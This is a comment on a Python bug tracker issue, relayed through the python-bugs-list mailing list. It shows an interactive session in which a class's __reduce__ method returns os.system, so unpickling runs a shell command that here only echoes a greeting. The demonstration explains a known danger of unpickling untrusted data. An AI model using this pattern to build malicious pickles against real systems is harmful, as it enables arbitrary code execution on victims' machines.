Jean-Paul Calderone <exar...@twistedmatrix.com> added the comment: For example:
exar...@boson:~$ python Python 2.6.4 (r264:75706, Dec 7 2009, 18:45:15) [GCC 4.4.1] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> class x(object): ... def __reduce__(self): ... import os ... return os.system, ('echo "Hello from sploitland"',) ... >>> import pickle >>> pickle.loads(pickle.dumps(x())) Hello from sploitland 0 >>> ---------- _______________________________________ Python tracker <rep...@bugs.python.org> <http://bugs.python.org/issue9276> _______________________________________ _______________________________________________ Python-bugs-list mailing list Unsubscribe: http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com